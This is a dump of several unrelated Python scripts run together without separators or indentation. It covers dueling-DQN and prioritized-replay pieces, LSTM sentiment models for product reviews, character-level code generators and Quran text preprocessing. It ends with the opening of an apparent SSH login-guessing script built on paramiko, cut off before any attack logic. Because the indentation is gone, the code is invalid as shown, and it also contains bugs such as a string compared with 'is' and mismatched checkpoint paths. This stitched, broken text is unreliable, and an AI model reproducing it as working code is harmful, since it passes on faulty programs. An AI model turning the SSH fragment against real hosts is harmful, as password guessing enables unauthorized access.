# Q(s, a) = V(s) + ( A(s, a) - 1/|A| * sum A(s, a') )
self.output = self.value + tf.subtract(self.advantage, tf.reduce_mean(self.advantage, axis=1, keepdims=True))
# Q is our predicted Q value
self.Q = tf.reduce_sum(tf.multiply(self.output, self.actions_))
self.absolute_errors = tf.abs(self.target_q - self.Q)
# w- * (target_q - q)**2
self.loss = tf.reduce_mean(self.is_weights_ * tf.squared_difference(self.target_q, self.Q))
self.optimizer = tf.train.RMSPropOptimizer(self.learning_rate).minimize(self.loss)
import numpy
class SumTree:
write = 0
def __init__(self, capacity):
self.capacity = capacity
self.tree = numpy.zeros( 2*capacity - 1 )
self.data = numpy.zeros( capacity, dtype=object )
def _propagate(self, idx, change):
parent = (idx - 1) // 2
self.tree[parent] += change
if parent != 0:
self._propagate(parent, change)
def _retrieve(self, idx, s):
left = 2 * idx + 1
right = left + 1
if left >= len(self.tree):
return idx
if s <= self.tree[left]:
return self._retrieve(left, s)
else:
return self._retrieve(right, s-self.tree[left])
def total(self):
return self.tree[0]
def add(self, p, data):
idx = self.write + self.capacity - 1
self.data[self.write] = data
self.update(idx, p)
self.write += 1
if self.write >= self.capacity:
self.write = 0
def update(self, idx, p):
change = p - self.tree[idx]
self.tree[idx] = p
self._propagate(idx, change)
def get(self, s):
idx = self._retrieve(0, s)
dataIdx = idx - self.capacity + 1
return (idx, self.tree[idx], self.data[dataIdx])
import numpy as np
from string import punctuation
from collections import Counter
from sklearn.model_selection import train_test_split
with open("data/reviews.txt") as f:
reviews = f.read()
with open("data/labels.txt") as f:
labels = f.read()
# remove all punctuations
all_text = ''.join([ c for c in reviews if c not in punctuation ])
reviews = all_text.split("\n")
reviews = [ review.strip() for review in reviews ]
all_text = ' '.join(reviews)
words = all_text.split()
print("Total words:", len(words))
# encoding the words
# dictionary that maps vocab words to integers here
vocab = sorted(set(words))
print("Unique words:", len(vocab))
# start is 1 because 0 is encoded for blank
vocab2int = {word: i for i, word in enumerate(vocab, start=1)}
# encoded reviews
encoded_reviews = []
for review in reviews:
encoded_reviews.append([vocab2int[word] for word in review.split()])
encoded_reviews = np.array(encoded_reviews)
# print("Number of reviews:", len(encoded_reviews))
# encode the labels, 1 for 'positive' and 0 for 'negative'
labels = labels.split("\n")
labels = [1 if label is 'positive' else 0 for label in labels]
# print("Number of labels:", len(labels))
review_lens = [len(x) for x in encoded_reviews]
counter_reviews_lens = Counter(review_lens)
# remove any reviews with 0 length
cleaned_encoded_reviews, cleaned_labels = [], []
for review, label in zip(encoded_reviews, labels):
if len(review) != 0:
cleaned_encoded_reviews.append(review)
cleaned_labels.append(label)
encoded_reviews = np.array(cleaned_encoded_reviews)
labels = cleaned_labels
# print("Number of reviews:", len(encoded_reviews))
# print("Number of labels:", len(labels))
sequence_length = 200
features = np.zeros((len(encoded_reviews), sequence_length), dtype=int)
for i, review in enumerate(encoded_reviews):
features[i, -len(review):] = review[:sequence_length]
# print(features[:10, :100])
# split data into train, validation and test
split_frac = 0.9
X_train, X_test, y_train, y_test = train_test_split(features, labels, test_size=1-split_frac)
X_test, X_validation, y_test, y_validation = train_test_split(X_test, y_test, test_size=0.5)
print(f"""Features shapes:
Train set: {X_train.shape}
Validation set: {X_validation.shape}
Test set: {X_test.shape}""")
print("Example:")
print(X_train[0])
print(y_train[0])
# X_train, X_validation = features[:split_frac*len(features)], features[split_frac*len(features):]
# y_train, y_validation = labels[:split]
import tensorflow as tf
from utils import get_batches
from train import *
import tensorflow as tf
from preprocess import vocab2int, X_train, y_train, X_validation, y_validation, X_test, y_test
from utils import get_batches
import numpy as np
def get_lstm_cell():
# basic LSTM cell
lstm = tf.contrib.rnn.BasicLSTMCell(lstm_size)
# dropout to the cell
drop = tf.contrib.rnn.DropoutWrapper(lstm, output_keep_prob=keep_prob)
return drop
# RNN paramaters
lstm_size = 256
lstm_layers = 1
batch_size = 256
learning_rate = 0.001
n_words = len(vocab2int) + 1 # Added 1 for the 0 that is for padding
# create the graph object
graph = tf.Graph()
# add nodes to the graph
with graph.as_default():
inputs = tf.placeholder(tf.int32, (None, None), "inputs")
labels = tf.placeholder(tf.int32, (None, None), "labels")
keep_prob = tf.placeholder(tf.float32, name="keep_prob")
# number of units in the embedding layer
embedding_size = 300
with graph.as_default():
# embedding lookup matrix
embedding = tf.Variable(tf.random_uniform((n_words, embedding_size), -1, 1))
# pass to the LSTM cells
embed = tf.nn.embedding_lookup(embedding, inputs)
# stackup multiple LSTM layers
cell = tf.contrib.rnn.MultiRNNCell([get_lstm_cell() for i in range(lstm_layers)])
initial_state = cell.zero_state(batch_size, tf.float32)
# pass cell and input to cell, returns outputs for each time step
# and the final state of the hidden layer
# run the data through the rnn nodes
outputs, final_state = tf.nn.dynamic_rnn(cell, embed, initial_state=initial_state)
# grab the last output
# use sigmoid for binary classification
predictions = tf.contrib.layers.fully_connected(outputs[:, -1], 1, activation_fn=tf.sigmoid)
# calculate cost using MSE
cost = tf.losses.mean_squared_error(labels, predictions)
optimizer = tf.train.AdamOptimizer(learning_rate).minimize(cost)
# nodes to calculate the accuracy
correct_pred = tf.equal(tf.cast(tf.round(predictions), tf.int32), labels)
accuracy = tf.reduce_mean(tf.cast(correct_pred, tf.float32))
saver = tf.train.Saver()
########### training ##########
epochs = 10
with tf.Session(graph=graph) as sess:
sess.run(tf.global_variables_initializer())
iteration = 1
for e in range(epochs):
state = sess.run(initial_state)
for i, (x, y) in enumerate(get_batches(X_train, y_train, batch_size=batch_size)):
y = np.array(y)
x = np.array(x)
feed = {inputs: x, labels: y[:, None],
keep_prob: 0.5,
initial_state: state}
loss, state, _ = sess.run([cost, final_state, optimizer], feed_dict=feed)
if iteration % 5 == 0:
print(f"[Epoch: {e}/{epochs}] Iteration: {iteration} Train loss: {loss:.3f}")
if iteration % 25 == 0:
val_acc = []
val_state = sess.run(cell.zero_state(batch_size, tf.float32))
for x, y in get_batches(X_validation, y_validation, batch_size=batch_size):
x, y = np.array(x), np.array(y)
feed = {inputs: x, labels: y[:, None],
keep_prob: 1, initial_state: val_state}
batch_acc, val_state = sess.run([accuracy, final_state], feed_dict=feed)
val_acc.append(batch_acc)
print(f"val_acc: {np.mean(val_acc):.3f}")
iteration += 1
saver.save(sess, "chechpoints/sentiment1.ckpt")
test_acc = []
with tf.Session(graph=graph) as sess:
saver = tf.train.Saver()
saver.restore(sess, tf.train.latest_checkpoint('checkpoints'))
test_state = sess.run(cell.zero_state(batch_size, tf.float32))
for ii, (x, y) in enumerate(get_batches(X_test, y_test, batch_size), 1):
feed = {inputs: x,
labels: y[:, None],
keep_prob: 1,
initial_state: test_state}
batch_acc, test_state = sess.run([accuracy, final_state], feed_dict=feed)
test_acc.append(batch_acc)
print("Test accuracy: {:.3f}".format(np.mean(test_acc)))
def get_batches(x, y, batch_size=100):
n_batches = len(x) // batch_size
x, y = x[:n_batches*batch_size], y[:n_batches*batch_size]
for i in range(0, len(x), batch_size):
yield x[i: i+batch_size], y[i: i+batch_size]
import numpy as np
import pandas as pd
import tqdm
from string import punctuation
punc = set(punctuation)
df = pd.read_csv(r"E:\datasets\sentiment\food_reviews\amazon-fine-food-reviews\Reviews.csv")
X = np.zeros((len(df), 2), dtype=object)
for i in tqdm.tqdm(range(len(df)), "Cleaning X"):
target = df['Text'].loc[i]
# X.append(''.join([ c.lower() for c in target if c not in punc ]))
X[i, 0] = ''.join([ c.lower() for c in target if c not in punc ])
X[i, 1] = df['Score'].loc[i]
pd.DataFrame(X, columns=["Text", "Score"]).to_csv("data/Reviews.csv")
### Model Architecture hyper parameters
embedding_size = 64
# sequence_length = 500
sequence_length = 42
LSTM_units = 128
### Training parameters
batch_size = 128
epochs = 20
### Preprocessing parameters
# words that occur less than n times to be deleted from dataset
N = 10
# test size in ratio, train size is 1 - test_size
test_size = 0.15
from keras.models import Sequential
from keras.layers import Embedding, LSTM, Dense, Activation, LeakyReLU, Dropout, TimeDistributed
from keras.layers import SpatialDropout1D
from config import LSTM_units
def get_model_binary(vocab_size, sequence_length):
embedding_size = 64
model=Sequential()
model.add(Embedding(vocab_size, embedding_size, input_length=sequence_length))
model.add(SpatialDropout1D(0.15))
model.add(LSTM(LSTM_units, recurrent_dropout=0.2))
model.add(Dropout(0.3))
model.add(Dense(1, activation='sigmoid'))
model.summary()
return model
def get_model_5stars(vocab_size, sequence_length, embedding_size, verbose=0):
model=Sequential()
model.add(Embedding(vocab_size, embedding_size, input_length=sequence_length))
model.add(SpatialDropout1D(0.15))
model.add(LSTM(LSTM_units, recurrent_dropout=0.2))
model.add(Dropout(0.3))
model.add(Dense(1, activation="linear"))
if verbose:
model.summary()
return model
import numpy as np
import pandas as pd
import tqdm
import pickle
from collections import Counter
from sklearn.model_selection import train_test_split
from utils import clean_text, tokenize_words
from config import N, test_size
def load_review_data():
# df = pd.read_csv("data/Reviews.csv")
df = pd.read_csv(r"E:\datasets\sentiment\food_reviews\amazon-fine-food-reviews\Reviews.csv")
# preview
print(df.head())
print(df.tail())
vocab = []
# X = np.zeros((len(df)*2, 2), dtype=object)
X = np.zeros((len(df), 2), dtype=object)
# for i in tqdm.tqdm(range(len(df)), "Cleaning X1"):
# target = df['Text'].loc[i]
# score = df['Score'].loc[i]
# X[i, 0] = clean_text(target)
# X[i, 1] = score
# for word in X[i, 0].split():
# vocab.append(word)
# k = i+1
k = 0
for i in tqdm.tqdm(range(len(df)), "Cleaning X2"):
target = df['Summary'].loc[i]
score = df['Score'].loc[i]
X[i+k, 0] = clean_text(target)
X[i+k, 1] = score
for word in X[i+k, 0].split():
vocab.append(word)
# vocab = set(vocab)
vocab = Counter(vocab)
# delete words that occur less than 10 times
vocab = { k:v for k, v in vocab.items() if v >= N }
# word to integer encoder dict
vocab2int = {word: i for i, word in enumerate(vocab, start=1)}
# pickle int2vocab for testing
print("Pickling vocab2int...")
pickle.dump(vocab2int, open("data/vocab2int.pickle", "wb"))
# encoded reviews
for i in tqdm.tqdm(range(X.shape[0]), "Tokenizing words"):
X[i, 0] = tokenize_words(str(X[i, 0]), vocab2int)
lengths = [ len(row) for row in X[:, 0] ]
print("min_length:", min(lengths))
print("max_length:", max(lengths))
X_train, X_test, y_train, y_test = train_test_split(X[:, 0], X[:, 1], test_size=test_size, shuffle=True, random_state=19)
return X_train, X_test, y_train, y_test, vocab
import os
# disable keras loggings
import sys
stderr = sys.stderr
sys.stderr = open(os.devnull, 'w')
import keras
sys.stderr = stderr
# to use CPU
os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID" # see issue #152
os.environ["CUDA_VISIBLE_DEVICES"] = "-1"
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'
import tensorflow as tf
config = tf.ConfigProto(intra_op_parallelism_threads=5,
inter_op_parallelism_threads=5,
allow_soft_placement=True,
device_count = {'CPU' : 1,
'GPU' : 0}
)
from model import get_model_5stars
from utils import clean_text, tokenize_words
from config import embedding_size, sequence_length
from keras.preprocessing.sequence import pad_sequences
import pickle
vocab2int = pickle.load(open("data/vocab2int.pickle", "rb"))
model = get_model_5stars(len(vocab2int), sequence_length=sequence_length, embedding_size=embedding_size)
model.load_weights("results/model_V20_0.38_0.80.h5")
if __name__ == "__main__":
import argparse
parser = argparse.ArgumentParser(description="Food Review evaluator")
parser.add_argument("review", type=str, help="The review of the product in text")
args = parser.parse_args()
review = tokenize_words(clean_text(args.review), vocab2int)
x = pad_sequences([review], maxlen=sequence_length)
print(f"{model.predict(x)[0][0]:.2f}/5")
# to use CPU
# import os
# os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID" # see issue #152
# os.environ["CUDA_VISIBLE_DEVICES"] = "-1"
# import tensorflow as tf
# config = tf.ConfigProto(intra_op_parallelism_threads=5,
# inter_op_parallelism_threads=5,
# allow_soft_placement=True,
# device_count = {'CPU' : 1,
# 'GPU' : 0}
# )
import os
import numpy as np
import pandas as pd
from keras.callbacks import ModelCheckpoint
from keras.preprocessing import sequence
from preprocess import load_review_data
from model import get_model_5stars
from config import sequence_length, embedding_size, batch_size, epochs
X_train, X_test, y_train, y_test, vocab = load_review_data()
vocab_size = len(vocab)
print("Vocab size:", vocab_size)
X_train = sequence.pad_sequences(X_train, maxlen=sequence_length)
X_test = sequence.pad_sequences(X_test, maxlen=sequence_length)
print("X_train.shape:", X_train.shape)
print("X_test.shape:", X_test.shape)
print("y_train.shape:", y_train.shape)
print("y_test.shape:", y_test.shape)
model = get_model_5stars(vocab_size, sequence_length=sequence_length, embedding_size=embedding_size)
model.load_weights("results/model_V40_0.60_0.67.h5")
model.compile(loss="mse", optimizer="adam", metrics=["accuracy"])
if not os.path.isdir("results"):
os.mkdir("results")
checkpointer = ModelCheckpoint("results/model_V40_{val_loss:.2f}_{val_acc:.2f}.h5", save_best_only=True, verbose=1)
model.fit(X_train, y_train, epochs=epochs,
validation_data=(X_test, y_test),
batch_size=batch_size,
callbacks=[checkpointer])
import numpy as np
from string import punctuation
# make it a set to accelerate tests
punc = set(punctuation)
def clean_text(text):
return ''.join([ c.lower() for c in str(text) if c not in punc ])
def tokenize_words(words, vocab2int):
words = words.split()
tokenized_words = np.zeros((len(words),))
for j in range(len(words)):
try:
tokenized_words[j] = vocab2int[words[j]]
except KeyError:
# didn't add any unk, just ignore
pass
return tokenized_words
import numpy as np
import pickle
import tqdm
from keras.models import Sequential
from keras.layers import Dense, LSTM, Dropout, Activation
from keras.callbacks import ModelCheckpoint
seed = "import os"
# output:
# ded of and alice as it go on and the court
# well you wont you wouldncopy thing
# there was not a long to growing anxiously any only a low every cant
# go on a litter which was proves of any only here and the things and the mort meding and the mort and alice was the things said to herself i cant remeran as if i can repeat eften to alice any of great offf its archive of and alice and a cancur as the mo
char2int = pickle.load(open("python-char2int.pickle", "rb"))
int2char = pickle.load(open("python-int2char.pickle", "rb"))
sequence_length = 100
n_unique_chars = len(char2int)
# building the model
model = Sequential([
LSTM(256, input_shape=(sequence_length, n_unique_chars), return_sequences=True),
Dropout(0.3),
LSTM(256),
Dense(n_unique_chars, activation="softmax"),
])
model.load_weights("results/python-v2-2.48.h5")
# generate 400 characters
generated = ""
for i in tqdm.tqdm(range(400), "Generating text"):
# make the input sequence
X = np.zeros((1, sequence_length, n_unique_chars))
for t, char in enumerate(seed):
X[0, (sequence_length - len(seed)) + t, char2int[char]] = 1
# predict the next character
predicted = model.predict(X, verbose=0)[0]
# converting the vector to an integer
next_index = np.argmax(predicted)
# converting the integer to a character
next_char = int2char[next_index]
# add the character to results
generated += next_char
# shift seed and the predicted character
seed = seed[1:] + next_char
print("Generated text:")
print(generated)
import numpy as np
import os
import pickle
from keras.models import Sequential
from keras.layers import Dense, LSTM, Dropout
from keras.callbacks import ModelCheckpoint
from utils import get_batches
# import requests
# content = requests.get("http://www.gutenberg.org/cache/epub/11/pg11.txt").text
# open("data/wonderland.txt", "w", encoding="utf-8").write(content)
from string import punctuation
# read the data
# text = open("data/wonderland.txt", encoding="utf-8").read()
text = open("E:\\datasets\\text\\my_python_code.py").read()
# remove caps
text = text.lower()
for c in "!":
text = text.replace(c, "")
# text = text.lower().replace("\n\n", "\n").replace("", "").replace("", "").replace("", "").replace("", "")
# text = text.translate(str.maketrans("", "", punctuation))
# text = text[:100_000]
n_chars = len(text)
unique_chars = ''.join(sorted(set(text)))
print("unique_chars:", unique_chars)
n_unique_chars = len(unique_chars)
print("Number of characters:", n_chars)
print("Number of unique characters:", n_unique_chars)
# dictionary that converts characters to integers
char2int = {c: i for i, c in enumerate(unique_chars)}
# dictionary that converts integers to characters
int2char = {i: c for i, c in enumerate(unique_chars)}
# save these dictionaries for later generation
pickle.dump(char2int, open("python-char2int.pickle", "wb"))
pickle.dump(int2char, open("python-int2char.pickle", "wb"))
# hyper parameters
sequence_length = 100
step = 1
batch_size = 128
epochs = 1
sentences = []
y_train = []
for i in range(0, len(text) - sequence_length, step):
sentences.append(text[i: i + sequence_length])
y_train.append(text[i+sequence_length])
print("Number of sentences:", len(sentences))
X = get_batches(sentences, y_train, char2int, batch_size, sequence_length, n_unique_chars, n_steps=step)
# for i, x in enumerate(X):
# if i == 1:
# break
# print(x[0].shape, x[1].shape)
# # vectorization
# X = np.zeros((len(sentences), sequence_length, n_unique_chars))
# y = np.zeros((len(sentences), n_unique_chars))
# for i, sentence in enumerate(sentences):
# for t, char in enumerate(sentence):
# X[i, t, char2int[char]] = 1
# y[i, char2int[y_train[i]]] = 1
# X = np.array([char2int[c] for c in text])
# print("X.shape:", X.shape)
# goal of X is (n_samples, sequence_length, n_chars)
# sentences = np.zeros(())
# print("y.shape:", y.shape)
# building the model
# model = Sequential([
# LSTM(128, input_shape=(sequence_length, n_unique_chars)),
# Dense(n_unique_chars, activation="softmax"),
# ])
# building the model
model = Sequential([
LSTM(256, input_shape=(sequence_length, n_unique_chars), return_sequences=True),
Dropout(0.3),
LSTM(256),
Dense(n_unique_chars, activation="softmax"),
])
model.load_weights("results/python-v2-2.48.h5")
model.summary()
model.compile(loss="categorical_crossentropy", optimizer="adam", metrics=["accuracy"])
if not os.path.isdir("results"):
os.mkdir("results")
checkpoint = ModelCheckpoint("results/python-v2-{loss:.2f}.h5", verbose=1)
# model.fit(X, y, batch_size=batch_size, epochs=epochs, callbacks=[checkpoint])
model.fit_generator(X, steps_per_epoch=len(sentences) // batch_size, epochs=epochs, callbacks=[checkpoint])
import numpy as np
def get_batches(sentences, y_train, char2int, batch_size, sequence_length, n_unique_chars, n_steps):
chars_per_batch = batch_size * n_steps
n_batches = len(sentences) // chars_per_batch
while True:
for i in range(0, len(sentences), batch_size):
X = np.zeros((batch_size, sequence_length, n_unique_chars))
y = np.zeros((batch_size, n_unique_chars))
for i, sentence in enumerate(sentences[i: i+batch_size]):
for t, char in enumerate(sentence):
X[i, t, char2int[char]] = 1
y[i, char2int[y_train[i]]] = 1
yield X, y
from pyarabic.araby import ALPHABETIC_ORDER
with open("quran.txt", encoding="utf8") as f:
text = f.read()
unique_chars = set(text)
print("unique chars:", unique_chars)
arabic_alpha = { c for c, order in ALPHABETIC_ORDER.items() }
to_be_removed = unique_chars - arabic_alpha
to_be_removed = to_be_removed - {'.', ' ', ''}
print(to_be_removed)
text = text.replace("", ".")
for char in to_be_removed:
text = text.replace(char, "")
text = text.replace(" ", " ")
text = text.replace(" \n", "")
text = text.replace("\n ", "")
with open("quran_cleaned.txt", "w", encoding="utf8") as f:
print(text, file=f)
from sklearn.model_selection import GridSearchCV
from keras.wrappers.scikit_learn import KerasClassifier
from utils import read_data, text_to_sequence, get_batches, get_data
from models import rnn_model
from keras.layers import LSTM
import numpy as np
text, int2char, char2int = read_data()
batch_size = 256
test_size = 0.2
n_steps = 200
n_chars = len(text)
vocab_size = len(set(text))
print("n_steps:", n_steps)
print("n_chars:", n_chars)
print("vocab_size:", vocab_size)
encoded = np.array(text_to_sequence(text))
n_train = int(n_chars * (1-test_size))
X_train = encoded[:n_train]
X_test = encoded[n_train:]
X, Y = get_data(X_train, batch_size, n_steps, vocab_size=vocab_size+1)
print(X.shape)
print(Y.shape)
# cell, num_layers, units, dropout, output_dim, batch_normalization=True, bidirectional=True
model = KerasClassifier(build_fn=rnn_model, input_dim=n_steps, cell=LSTM, num_layers=2, dropout=0.2, output_dim=vocab_size+1,
batch_normalization=True, bidirectional=True)
params = {
"units": [100, 128, 200, 256, 300]
}
grid = GridSearchCV(estimator=model, param_grid=params)
grid_result = grid.fit(X, Y)
print(grid_result.best_estimator_)
print(grid_result.best_params_)
print(grid_result.best_score_)
from keras.models import Sequential
from keras.layers import LSTM, Dropout, BatchNormalization, LeakyReLU, Dense, Activation, TimeDistributed, Bidirectional
def rnn_model(input_dim, cell, num_layers, units, dropout, output_dim, batch_normalization=True, bidirectional=True):
model = Sequential()
for i in range(num_layers):
if i == 0:
# first time, specify input_shape
# if bidirectional:
# model.add(Bidirectional(cell(units, input_shape=(None, input_dim), return_sequences=True)))
# else:
model.add(cell(units, input_shape=(None, input_dim), return_sequences=True))
if batch_normalization:
model.add(BatchNormalization())
model.add(Dropout(dropout))
model.add(LeakyReLU(alpha=0.1))
else:
if i == num_layers - 1:
return_sequences = False
else:
return_sequences = True
if bidirectional:
model.add(Bidirectional(cell(units, return_sequences=return_sequences)))
else:
model.add(cell(units, return_sequences=return_sequences))
if batch_normalization:
model.add(BatchNormalization())
model.add(Dropout(dropout))
model.add(LeakyReLU(alpha=0.1))
model.add(Dense(output_dim, activation="softmax"))
model.compile(loss="categorical_crossentropy", optimizer="nadam", metrics=["accuracy"])
return model
# to use CPU
import os
os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID" # see issue #152
os.environ["CUDA_VISIBLE_DEVICES"] = "-1"
import tensorflow as tf
config = tf.ConfigProto(intra_op_parallelism_threads=5,
inter_op_parallelism_threads=5,
allow_soft_placement=True,
device_count = {'CPU' : 1,
'GPU' : 0}
)
from models import rnn_model
from keras.layers import LSTM
from utils import sequence_to_text, get_data
import numpy as np
import pickle
char2int = pickle.load(open("results/char2int.pickle", "rb"))
int2char = { v:k for k, v in char2int.items() }
print(int2char)
n_steps = 500
def text_to_sequence(text):
global char2int
return [ char2int[c] for c in text ]
def pick_top_n(preds, vocab_size, top_n=5):
p = np.squeeze(preds)
p[np.argsort(p)[:-top_n]] = 0
p = p / np.sum(p)
c = np.random.choice(vocab_size, 1, p=p)[0]
return c
def logits_to_text(logits):
"""
Turn logits from a neural network into text using the tokenizer
:param logits: Logits from a neural network
:param tokenizer: Keras Tokenizer fit on the labels
:return: String that represents the text of the logits
"""
return int2char[np.argmax(logits, axis=0)]
# return ''.join([int2char[prediction] for prediction in np.argmax(logits, 1)])
def generate_code(model, initial_text, n_chars=100):
new_chars = ""
for i in range(n_chars):
x = np.array(text_to_sequence(initial_text))
x, _ = get_data(x, 64, n_steps, 1)
pred = model.predict(x)[0][0]
c = logits_to_text(pred)
new_chars += c
initial_text += c
return new_chars
model = rnn_model(input_dim=n_steps, output_dim=99, cell=LSTM, num_layers=3, units=200, dropout=0.2, batch_normalization=True)
model.load_weights("results/rnn_3.5")
x = """x = np.array(text_to_sequence(x))
x, _ = get_data(x, n_steps, 1)
print(x.shape)
print(x.shape)
print(model.predict_proba(x))
print(model.predict_classes(x))
def pick_top_n(preds, vocab_size, top_n=5):
p = np.squeeze(preds)
p[np.argsort(p)[:-top_n]] = 0
p = p / np.sum(p)
c = np.random.choice(vocab_size, 1, p=p)[0]
return c
def sample(checkpoint, n_samples, lstm_size, vocab_size, prime="The"):
samples = [c for c in prime]
with train_chars.tf.Session() as sess:
saver.restore(sess, checkpoint)
new_state = sess.run(model.initial_state)
for c in prime:
x = np.zeros((1, 1))
x[0,0] = train_chars.char2int[c]
feed = {model.inputs: x,
model.keep_prob: 1.,
model.initial_state: new_state}
preds, new_state = sess.run([model.prediction, model.final_state],
feed_dict=feed)
# print("Preds:", preds)
c = pick_top_n(preds, len(train_chars.vocab))
samples.append(train_chars.int2char[c])
for i in range(n_samples):
x[0,0] = c
feed = {model.inputs: x,
model.keep_prob: 1.,
model.initial_state: new_state}
preds, new_state = sess.run([model.prediction, model.final_state],
feed_dict=feed)
c = pick_top_n(preds, len(train_chars.vocab))
char = train_chars.int2char[c]
samples.append(char)
# if i == n_samples - 1 and char != " " and char != ".":
if i == n_samples - 1 and char != " ":
# while char != "." and char != " ":
while char != " ":
x[0,0] = c
feed = {model.inputs: x,
model.keep_prob: 1.,
model.initial_state: new_state}
preds, new_state = sess.run([model.prediction, model.final_state],
feed_dict=feed)
c = pick_top_n(preds, len(train_chars.vocab))
char = train_chars.int2char[c]
samples.append(cha
"""
# print(x.shape)
# print(x.shape)
# pred = model.predict(x)[0][0]
# print(pred)
# print(logits_to_text(pred))
# print(model.predict_classes(x))
print(generate_code(model, x, n_chars=500))
from models import rnn_model
from keras.layers import LSTM
from keras.callbacks import ModelCheckpoint
from utils import text_to_sequence, sequence_to_text, get_batches, read_data, get_data, get_data_length
import numpy as np
import os
text, int2char, char2int = read_data(load=False)
batch_size = 256
test_size = 0.2
n_steps = 500
n_chars = len(text)
vocab_size = len(set(text))
print("n_steps:", n_steps)
print("n_chars:", n_chars)
print("vocab_size:", vocab_size)
encoded = np.array(text_to_sequence(text))
n_train = int(n_chars * (1-test_size))
X_train = encoded[:n_train]
X_test = encoded[n_train:]
train = get_batches(X_train, batch_size, n_steps, output_format="many", vocab_size=vocab_size+1)
test = get_batches(X_test, batch_size, n_steps, output_format="many", vocab_size=vocab_size+1)
for i, t in enumerate(train):
if i == 2:
break
print(t[0])
print(np.array(t[0]).shape)
# print(test.shape)
# # DIM = 28
# model = rnn_model(input_dim=n_steps, output_dim=vocab_size+1, cell=LSTM, num_layers=3, units=200, dropout=0.2, batch_normalization=True)
# model.summary()
# model.compile(loss="categorical_crossentropy", optimizer="nadam", metrics=["accuracy"])
# if not os.path.isdir("results"):
# os.mkdir("results")
# checkpointer = ModelCheckpoint("results/rnn_{val_loss:.1f}", save_best_only=True, verbose=1)
# train_steps_per_epoch = get_data_length(X_train, n_steps, output_format="one") // batch_size
# test_steps_per_epoch = get_data_length(X_test, n_steps, output_format="one") // batch_size
# print("train_steps_per_epoch:", train_steps_per_epoch)
# print("test_steps_per_epoch:", test_steps_per_epoch)
# model.load_weights("results/rnn_3.2")
# model.fit_generator(train,
# epochs=30,
# validation_data=(test),
# steps_per_epoch=train_steps_per_epoch,
# validation_steps=test_steps_per_epoch,
# callbacks=[checkpointer],
# verbose=1)
# model.save("results/rnn_final.model")
import numpy as np
import tqdm
import pickle
from keras.utils import to_categorical
int2char, char2int = None, None
def read_data(load=False):
global int2char
global char2int
with open("E:\\datasets\\text\\my_python_code.py") as f:
text = f.read()
unique_chars = set(text)
if not load:
int2char = { i: c for i, c in enumerate(unique_chars, start=1) }
char2int = { c: i for i, c in enumerate(unique_chars, start=1) }
pickle.dump(int2char, open("results/int2char.pickle", "wb"))
pickle.dump(char2int, open("results/char2int.pickle", "wb"))
else:
int2char = pickle.load(open("results/int2char.pickle", "rb"))
char2int = pickle.load(open("results/char2int.pickle", "rb"))
return text, int2char, char2int
def get_batches(arr, batch_size, n_steps, vocab_size, output_format="many"):
'''Create a generator that returns batches of size
batch_size x n_steps from arr.
Arguments
---------
arr: Array you want to make batches from
batch_size: Batch size, the number of sequences per batch
n_steps: Number of sequence steps per batch
'''
chars_per_batch = batch_size * n_steps
n_batches = len(arr) // chars_per_batch
arr = arr[:chars_per_batch * n_batches]
arr = arr.reshape((batch_size, -1))
if output_format == "many":
while True:
for n in range(0, arr.shape[1], n_steps):
x = arr[:, n: n+n_steps]
y_temp = arr[:, n+1:n+n_steps+1]
y = np.zeros(x.shape, dtype=y_temp.dtype)
y[:, :y_temp.shape[1]] = y_temp
yield x.reshape(1, x.shape[0], x.shape[1]), y.reshape(1, y.shape[0], y.shape[1])
elif output_format == "one":
while True:
# X = np.zeros((arr.shape[1], n_steps))
# y = np.zeros((arr.shape[1], 1))
# for i in range(n_samples-n_steps):
# X[i] = np.array([ p.replace(",", "") if isinstance(p, str) else p for p in df.Price.iloc[i: i+n_steps] ])
# price = df.Price.iloc[i + n_steps]
# y[i] = price.replace(",", "") if isinstance(price, str) else price
for n in range(arr.shape[1] - n_steps-1):
x = arr[:, n: n+n_steps]
y = arr[:, n+n_steps+1]
# print("y.shape:", y.shape)
y = to_categorical(y, num_classes=vocab_size)
# print("y.shape after categorical:", y.shape)
y = np.expand_dims(y, axis=0)
yield x.reshape(1, x.shape[0], x.shape[1]), y
def get_data(arr, batch_size, n_steps, vocab_size):
# n_samples = len(arr) // n_seq
# X = np.zeros((n_seq, n_samples))
# Y = np.zeros((n_seq, n_samples))
chars_per_batch = batch_size * n_steps
n_batches = len(arr) // chars_per_batch
arr = arr[:chars_per_batch * n_batches]
arr = arr.reshape((batch_size, -1))
# for index, i in enumerate(range(0, n_samples*n_seq, n_seq)):
# x = arr[i:i+n_seq]
# y = arr[i+1:i+n_seq+1]
# if len(x) != n_seq or len(y) != n_seq:
# break
# X[:, index] = x
# Y[:, index] = y
X = np.zeros((batch_size, arr.shape[1]))
Y = np.zeros((batch_size, vocab_size))
for n in range(arr.shape[1] - n_steps-1):
x = arr[:, n: n+n_steps]
y = arr[:, n+n_steps+1]
# print("y.shape:", y.shape)
y = to_categorical(y, num_classes=vocab_size)
# print("y.shape after categorical:", y.shape)
# y = np.expand_dims(y, axis=1)
X[:, n: n+n_steps] = x
Y[n] = y
# yield x.reshape(1, x.shape[0], x.shape[1]), y
return np.expand_dims(X, axis=1), Y
# return n_samples
# return X.T.reshape(1, X.shape[1], X.shape[0]), Y.T.reshape(1, Y.shape[1], Y.shape[0])
def get_data_length(arr, n_seq, output_format="many"):
if output_format == "many":
return len(arr) // n_seq
elif output_format == "one":
return len(arr) - n_seq
def text_to_sequence(text):
global char2int
return [ char2int[c] for c in text ]
def sequence_to_text(sequence):
global int2char
return ''.join([ int2char[i] for i in sequence ])
import json
import os
import glob
CUR_DIR = os.getcwd()
text = ""
# for filename in os.listdir(os.path.join(CUR_DIR, "data", "json")):
surat = [ f"surah_{i}.json" for i in range(1, 115) ]
for filename in surat:
filename = os.path.join(CUR_DIR, "data", "json", filename)
file = json.load(open(filename, encoding="utf8"))
content = file['verse']
for verse_id, ayah in content.items():
text += f"{ayah}."
n_ayah = len(text.split("."))
n_words = len(text.split(" "))
n_chars = len(text)
print(f"Number of ayat: {n_ayah}, Number of words: {n_words}, Number of chars: {n_chars}")
with open("quran.txt", "w", encoding="utf8") as quran_file:
print(text, file=quran_file)
import paramiko
import socket
import time
from colorama import init, Fore
# initialize colorama
init()
GREEN = Fore.GREEN
RED = Fore.RED
RESET = Fore.RESET
BLUE = Fore.BLUE
def is_ssh_open(hostname, username, password):
# initialize SSH client
client = paramiko.SSHClient()
